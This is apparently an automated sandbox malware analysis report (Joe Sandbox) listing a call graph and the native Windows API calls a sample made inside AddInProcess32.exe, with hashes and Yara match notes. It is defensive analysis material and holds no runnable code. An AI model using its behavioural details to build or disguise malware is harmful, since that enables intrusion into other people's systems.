41cf00 2 API calls 97262 414205 97260->97262 97261->97260 97382 41cf60 LdrLoadDll RtlFreeHeap 97262->97382 97264 414334 97383 41cf60 LdrLoadDll RtlFreeHeap 97264->97383 97266 41433e 97384 41cf60 LdrLoadDll RtlFreeHeap 97266->97384 97268 414348 97385 41cf60 LdrLoadDll RtlFreeHeap 97268->97385 97270 414352 97386 41cf60 LdrLoadDll RtlFreeHeap 97270->97386 97272->97138 97274 4153a1 97273->97274 97275 414a50 8 API calls 97274->97275 97277 4153b7 97275->97277 97276 41540a 97276->97142 97277->97276 97278 4153f2 97277->97278 97279 415405 97277->97279 97280 41bd90 2 API calls 97278->97280 97281 41bd90 2 API calls 97279->97281 97282 4153f7 97280->97282 97281->97276 97282->97142 97387 41ac00 97283->97387 97286 41ac00 LdrLoadDll 97287 41ad5d 97286->97287 97288 41ac00 LdrLoadDll 97287->97288 97289 41ad66 97288->97289 97290 41ac00 LdrLoadDll 97289->97290 97291 41ad6f 97290->97291 97292 41ac00 LdrLoadDll 97291->97292 97293 41ad78 97292->97293 97294 41ac00 LdrLoadDll 97293->97294 97295 41ad81 97294->97295 97296 41ac00 LdrLoadDll 97295->97296 97297 41ad8d 97296->97297 97298 41ac00 LdrLoadDll 97297->97298 97299 41ad96 97298->97299 97300 41ac00 LdrLoadDll 97299->97300 97301 41ad9f 97300->97301 97302 41ac00 LdrLoadDll 97301->97302 97303 41ada8 97302->97303 97304 41ac00 LdrLoadDll 97303->97304 97305 41adb1 97304->97305 97306 41ac00 LdrLoadDll 97305->97306 97307 41adba 97306->97307 97308 41ac00 LdrLoadDll 97307->97308 97309 41adc6 97308->97309 97310 41ac00 LdrLoadDll 97309->97310 97311 41adcf 97310->97311 97312 41ac00 LdrLoadDll 97311->97312 97313 41add8 97312->97313 97314 41ac00 LdrLoadDll 97313->97314 97315 41ade1 97314->97315 97316 41ac00 LdrLoadDll 97315->97316 97317 41adea 97316->97317 97318 41ac00 LdrLoadDll 97317->97318 97319 41adf3 97318->97319 97320 41ac00 LdrLoadDll 97319->97320 97321 41adff 97320->97321 97322 41ac00 LdrLoadDll 97321->97322 97323 41ae08 97322->97323 97324 41ac00 LdrLoadDll 97323->97324 97325 41ae11 97324->97325 97326 41ac00 LdrLoadDll 97325->97326 97327 41ae1a 97326->97327 97328 41ac00 LdrLoadDll 97327->97328 97329 41ae23 97328->97329 97330 41ac00 LdrLoadDll 97329->97330 97331 41ae2c 97330->97331 97332 41ac00 LdrLoadDll 97331->97332 97333 41ae38 97332->97333 97334 41ac00 LdrLoadDll 97333->97334 97335 41ae41 97334->97335 97336 41ac00 LdrLoadDll 97335->97336 97337 41ae4a 97336->97337 97338 41ac00 LdrLoadDll 97337->97338 97339 41ae53 97338->97339 97340 41ac00 LdrLoadDll 97339->97340 97341 41ae5c 97340->97341 97342 41ac00 LdrLoadDll 97341->97342 97343 41ae65 97342->97343 97344 41ac00 LdrLoadDll 97343->97344 97345 41ae71 97344->97345 97346 41ac00 LdrLoadDll 97345->97346 97347 41ae7a 97346->97347 97348 41ac00 LdrLoadDll 97347->97348 97349 41ae83 97348->97349 97350 41ac00 LdrLoadDll 97349->97350 97351 41ae8c 97350->97351 97352 41ac00 LdrLoadDll 97351->97352 97353 41ae95 97352->97353 97354 41ac00 LdrLoadDll 97353->97354 97355 41ae9e 97354->97355 97356 41ac00 LdrLoadDll 97355->97356 97357 41aeaa 97356->97357 97358 41ac00 LdrLoadDll 97357->97358 97359 41aeb3 97358->97359 97360 41ac00 LdrLoadDll 97359->97360 97361 41aebc 97360->97361 97361->97146 97363 41af30 LdrLoadDll 97362->97363 97364 419eac 97363->97364 97393 1802df0 LdrInitializeThunk 97364->97393 97365 419ec3 97365->97066 97367->97144 97369 41a52c NtAllocateVirtualMemory 97368->97369 97370 41af30 LdrLoadDll 97368->97370 97369->97246 97370->97369 97372 41cf10 97371->97372 97373 41cf16 97371->97373 97372->97252 97374 41bf60 2 API calls 97373->97374 97375 41cf3c 97374->97375 97375->97252 97377 41cfc5 97376->97377 97379 41cffd 97376->97379 97378 41bf60 2 API calls 97377->97378 97380 41cfda 97378->97380 97379->97256 97381 41bd90 2 API calls 97380->97381 97381->97379 97382->97264 97383->97266 97384->97268 97385->97270 97386->97272 97388 41ac1b 97387->97388 97389 414e50 LdrLoadDll 97388->97389 97390 41ac3b 97389->97390 97391 414e50 LdrLoadDll 97390->97391 97392 41ace7 97390->97392 97391->97392 97392->97286 97393->97365 97395 1802c11 97394->97395 97396 1802c1f LdrInitializeThunk 97394->97396 97395->97153 97396->97153 97398 41af30 LdrLoadDll 97397->97398 97399 41a65c RtlFreeHeap 97398->97399 97399->97156 97401 407eb0 97400->97401 97402 407eab 97400->97402 97403 41bd10 2 API calls 97401->97403 97402->97074 97412 407ed5 97403->97412 97404 407f38 97404->97074 97405 419e90 2 API calls 97405->97412 97406 407f3e 97408 407f64 97406->97408 97409 41a590 2 API calls 97406->97409 97408->97074 97411 407f55 97409->97411 97410 41bd10 2 API calls 97410->97412 97411->97074 97412->97404 97412->97405 97412->97406 97412->97410 97416 41a590 97412->97416 97414 40817e 97413->97414 97415 41a590 2 API calls 97413->97415 97414->97035 97415->97414 97417 41af30 LdrLoadDll 97416->97417 97418 41a5ac 97417->97418 97421 1802c70 LdrInitializeThunk 97418->97421 97419 41a5c3 97419->97412 97421->97419 97423 41b593 97422->97423 97426 40acf0 97423->97426 97425 409c5b 97425->97043 97428 40ad14 97426->97428 97427 40ad1b 97427->97425 97428->97427 97429 40ad50 LdrLoadDll 97428->97429 97430 40ad67 97428->97430 97429->97430 97430->97425 97432 40b063 97431->97432 97434 40b0e0 97432->97434 97446 419c60 LdrLoadDll 97432->97446 97434->97048 97436 41af30 LdrLoadDll 97435->97436 97437 40f1bb 97436->97437 97437->97056 97438 41a7a0 97437->97438 97439 41a7bf LookupPrivilegeValueW 97438->97439 97440 41af30 LdrLoadDll 97438->97440 97439->97052 97440->97439 97442 41af30 LdrLoadDll 97441->97442 97443 41a24c 97442->97443 97447 1802ea0 LdrInitializeThunk 97443->97447 97444 41a26b 97444->97055 97446->97434 97447->97444 97449 40b1f0 97448->97449 97450 40b040 LdrLoadDll 97449->97450 97451 40b204 97450->97451 97451->96990 97453 40ae4d 97452->97453 97454 40ae51 97452->97454 97453->96993 97455 40ae6a 97454->97455 97456 40ae9c 97454->97456 97498 419ca0 LdrLoadDll 97455->97498 97499 419ca0 LdrLoadDll 97456->97499 97458 40aead 97458->96993 97460 40ae8c 97460->96993 97462 40f4a0 3 API calls 97461->97462 97463 4143c6 97461->97463 97462->97463 97463->96995 97500 4087a0 97464->97500 97467 408a9d 97467->96997 97468 4087a0 19 API calls 97469 408a8a 97468->97469 97469->97467 97518 40f710 10 API calls 97469->97518 97472 41af30 LdrLoadDll 97471->97472 97473 41a4ec 97472->97473 97637 1802e80 LdrInitializeThunk 97473->97637 97474 40c322 97476 40f4a0 97474->97476 97477 40f4bd 97476->97477 97638 419f90 97477->97638 97480 40f505 97480->97001 97481 419fe0 2 API calls 97482 40f52e 97481->97482 97482->97001 97484 419ffc 97483->97484 97485 41af30 LdrLoadDll 97483->97485 97644 1802d10 LdrInitializeThunk 97484->97644 97485->97484 97486 40c385 97486->97007 97486->97010 97489 41af30 LdrLoadDll 97488->97489 97490 41a04c 97489->97490 97645 1802d30 LdrInitializeThunk 97490->97645 97491 40c459 97491->97018 97494 41af30 LdrLoadDll 97493->97494 97495 419e0c 97494->97495 97646 1802fb0 LdrInitializeThunk 97495->97646 97496 40c4ac 97496->97022 97498->97460 97499->97458 97501 407ea0 4 API calls 97500->97501 97506 4087ba 97500->97506 97501->97506 97502 408a49 97502->97467 97502->97468 97503 408a3f 97504 408160 2 API calls 97503->97504 97504->97502 97506->97502 97506->97503 97508 419ed0 2 API calls 97506->97508 97512 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 97506->97512 97515 419df0 2 API calls 97506->97515 97516 41a460 LdrLoadDll NtClose 97506->97516 97519 419ce0 97506->97519 97522 4085d0 97506->97522 97534 40f5f0 LdrLoadDll NtClose 97506->97534 97535 419d60 LdrLoadDll 97506->97535 97536 419d90 LdrLoadDll 97506->97536 97537 419e20 LdrLoadDll 97506->97537 97538 4083a0 97506->97538 97554 405f60 LdrLoadDll 97506->97554 97508->97506 97512->97506 97515->97506 97516->97506 97518->97467 97520 419cfc 97519->97520 97521 41af30 LdrLoadDll 97519->97521 97520->97506 97521->97520 97523 4085e6 97522->97523 97555 419850 97523->97555 97525 408771 97525->97506 97526 4085ff 97526->97525 97576 4081a0 97526->97576 97528 4086e5 97528->97525 97529 4083a0 11 API calls 97528->97529 97530 408713 97529->97530 97530->97525 97531 419ed0 2 API calls 97530->97531 97532 408748 97531->97532 97532->97525 97533 41a4d0 2 API calls 97532->97533 97533->97525 97534->97506 97535->97506 97536->97506 97537->97506 97539 4083c9 97538->97539 97616 408310 97539->97616 97542 41a4d0 2 API calls 97543 4083dc 97542->97543 97543->97542 97544 408467 97543->97544 97546 408462 97543->97546 97624 40f670 97543->97624 97544->97506 97545 41a460 2 API calls 97547 40849a 97545->97547 97546->97545 97547->97544 97548 419ce0 LdrLoadDll 97547->97548 97549 4084ff 97548->97549 97549->97544 97628 419d20 97549->97628 97551 408563 97551->97544 97552 414a50 8 API calls 97551->97552 97553 4085b8 97552->97553 97553->97506 97554->97506 97556 41bf60 2 API calls 97555->97556 97557 419867 97556->97557 97583 409310 97557->97583 97559 419882 97560 4198c0 97559->97560 97561 4198a9 97559->97561 97564 41bd10 2 API calls 97560->97564 97562 41bd90 2 API calls 97561->97562 97563 4198b6 97562->97563 97563->97526 97565 4198fa 97564->97565 97566 41bd10 2 API calls 97565->97566 97569 419913 97566->97569 97573 419bb4 97569->97573 97589 41bd50 97569->97589 97570 419ba0 97571 41bd90 2 API calls 97570->97571 97572 419baa 97571->97572 97572->97526 97574 41bd90 2 API calls 97573->97574 97575 419c09 97574->97575 97575->97526 97577 40829f 97576->97577 97578 4081b5 97576->97578 97577->97528 97578->97577 97579 414a50 8 API calls 97578->97579 97580 408222 97579->97580 97581 41bd90 2 API calls 97580->97581 97582 408249 97580->97582 97581->97582 97582->97528 97584 409335 97583->97584 97585 40acf0 LdrLoadDll 97584->97585 97586 409368 97585->97586 97588 40938d 97586->97588 97592 40cf20 97586->97592 97588->97559 97610 41a550 97589->97610 97593 40cf4c 97592->97593 97594 41a1b0 LdrLoadDll 97593->97594 97595 40cf65 97594->97595 97596 40cf6c 97595->97596 97603 41a1f0 97595->97603 97596->97588 97600 40cfa7 97601 41a460 2 API calls 97600->97601 97602 40cfca 97601->97602 97602->97588 97604 41a20c 97603->97604 97605 41af30 LdrLoadDll 97603->97605 97609 1802ca0 LdrInitializeThunk 97604->97609 97605->97604 97606 40cf8f 97606->97596 97608 41a7e0 LdrLoadDll 97606->97608 97608->97600 97609->97606 97611 41af30 LdrLoadDll 97610->97611 97612 41a56c 97611->97612 97615 1802f90 LdrInitializeThunk 97612->97615 97613 419b99 97613->97570 97613->97573 97615->97613 97617 408328 97616->97617 97618 40acf0 LdrLoadDll 97617->97618 97619 408343 97618->97619 97620 414e50 LdrLoadDll 97619->97620 97621 408353 97620->97621 97622 40835c PostThreadMessageW 97621->97622 97623 408370 97621->97623 97622->97623 97623->97543 97625 40f683 97624->97625 97631 419e60 97625->97631 97629 41af30 LdrLoadDll 97628->97629 97630 419d3c 97629->97630 97630->97551 97632 419e7c 97631->97632 97633 41af30 LdrLoadDll 97631->97633 97636 1802dd0 LdrInitializeThunk 97632->97636 97633->97632 97634 40f6ae 97634->97543 97636->97634 97637->97474 97639 41af30 LdrLoadDll 97638->97639 97640 419fac 97639->97640 97643 1802f30 LdrInitializeThunk 97640->97643 97641 40f4fe 97641->97480 97641->97481 97643->97641 97644->97486 97645->97491 97646->97496

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 0041A3DA Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37filenativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 0 41a3da-41a429 call 41af30 NtReadFile
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                                                                                        • String ID: 1JA$rMA$rMA
                                                                                                                                                                                                                                        • API String ID: 2738559852-782607585
                                                                                                                                                                                                                                        • Opcode ID: 91de646ca9939cf2df727c61be254ca9a4b42c672d97e18c7ba6ea618f0c1c13
                                                                                                                                                                                                                                        • Instruction ID: 794ab0cc949bf04e671dc0aa680c827d04dcee994fe3ef64f97f4a408e956d51
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91de646ca9939cf2df727c61be254ca9a4b42c672d97e18c7ba6ea618f0c1c13
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41F0FFB2210108ABCB14DF89DC50DDB77A9AF8C754F158249BE1D97245D630ED51CBA1
                                                                                                                                                                                                                                        Function 0041A3E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 3 41a3e0-41a3f6 4 41a3fc-41a429 NtReadFile 3->4 5 41a3f7 call 41af30 3->5 5->4
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                                                                                        • String ID: 1JA$rMA$rMA
                                                                                                                                                                                                                                        • API String ID: 2738559852-782607585
                                                                                                                                                                                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                                                                                        • Instruction ID: c75c44bd16ed9a046d03b4490adc68ebadf214b0f3589fd2ba36fb57c0fad8bd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                                                                                                                                                                                                        Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 243 40acf0-40ad0c 244 40ad14-40ad19 243->244 245 40ad0f call 41cc20 243->245 246 40ad1b-40ad1e 244->246 247 40ad1f-40ad2d call 41d040 244->247 245->244 250 40ad3d-40ad4e call 41b470 247->250 251 40ad2f-40ad3a call 41d2c0 247->251 256 40ad50-40ad64 LdrLoadDll 250->256 257 40ad67-40ad6a 250->257 251->250 256->257
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Load
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2234796835-0
                                                                                                                                                                                                                                        • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                                                                                                                        • Instruction ID: 667dcf47c4413345b20473d406be44d3d8b7ebea9a3b2269cd40777f9644ce6e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79015EB5D0020DBBDB10EBA1DC42FDEB3799F54308F0045AAA908A7281F638EB54CB95
                                                                                                                                                                                                                                        Function 0041A32A Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 258 41a32a-41a381 call 41af30 NtCreateFile
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                        • Opcode ID: 3239d794ebb1183da48ea9a34df6c4a9be463a02c5b7532882bb7a399a89993a
                                                                                                                                                                                                                                        • Instruction ID: 1f6acbba30b6ddc1c1fecc31a4de8a74763a96ef98365b96f54ac2aee2beb343
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3239d794ebb1183da48ea9a34df6c4a9be463a02c5b7532882bb7a399a89993a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B01F2B2201508ABCB08CF88CC80EEB33ADAF8C314F058208BA0DD7240C630E811CBA0
                                                                                                                                                                                                                                        Function 0041A330 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 261 41a330-41a346 262 41a34c-41a381 NtCreateFile 261->262 263 41a347 call 41af30 261->263 263->262
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                                                                        • Instruction ID: 7ed6e6cb708c972561b0f9910f559a39af1ab3cc862b6eef20835abd22e26781
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4F0BDB2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E851CBA4
                                                                                                                                                                                                                                        Function 0041A50A Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 264 41a50a-41a54d call 41af30 NtAllocateVirtualMemory
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                                                                                                                        • Opcode ID: 0bd1b5fd80fc2771d45b7b0d2bc21b87da9f544ec152bf7401257f331d30bd1f
                                                                                                                                                                                                                                        • Instruction ID: 333a3124395fd10c7c887a9ae2fee1e863ea7100ed245122367cf52a97435a6f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0bd1b5fd80fc2771d45b7b0d2bc21b87da9f544ec152bf7401257f331d30bd1f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4F082B22102046FCB14CF98CC81EEB37A9EF8C314F11824DFA1C97281C235E812CBA4
                                                                                                                                                                                                                                        Function 0041A510 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 267 41a510-41a526 268 41a52c-41a54d NtAllocateVirtualMemory 267->268 269 41a527 call 41af30 267->269 269->268
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                                                                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                                                                        • Instruction ID: 8b47746d7073478515a2f8fd1fb94e42dcc9ffa91ac9ff965dae3841ed3a313c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CF015B2210208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                                                                                                                                                                                                                        Function 0041A45A Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Close
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                                                                                                        • Opcode ID: 20ec1dab1c7e10f3fdcb86be1c0f31b50423aac9201c69477fa6f971da774df3
                                                                                                                                                                                                                                        • Instruction ID: c7470330ce14e16143e16b8e865851a69b492940d029b142d037ba4b6b49d7aa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 20ec1dab1c7e10f3fdcb86be1c0f31b50423aac9201c69477fa6f971da774df3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78E08C72A00210AFDB10EFD8CC86ED7BB69EF48720F05449ABE1C6B242C930FA1087D1
                                                                                                                                                                                                                                        Function 0041A460 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Close
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                                                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                                                                        • Instruction ID: e9450f8bec15428cdd91297f97b7848412804bda5c7d31b3f0e5b01193c95e83
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3CD01776211214ABD710EB99CC85EE77BACEF48764F15449ABA189B242C530FA1186E0
                                                                                                                                                                                                                                        Function 01802BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 9cbc63c896ff4a40a2b76b89aeafa48c6f8174167711b24c461d7aa015f18837
                                                                                                                                                                                                                                        • Instruction ID: dff79a1577d892636c46d74f21fc9a53cc39affc7984559c62cea13c48772562
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9cbc63c896ff4a40a2b76b89aeafa48c6f8174167711b24c461d7aa015f18837
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1390023324140807D1807158440564A100997D3301F95C015A1029654DCB158B5D77A2
                                                                                                                                                                                                                                        Function 01802B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
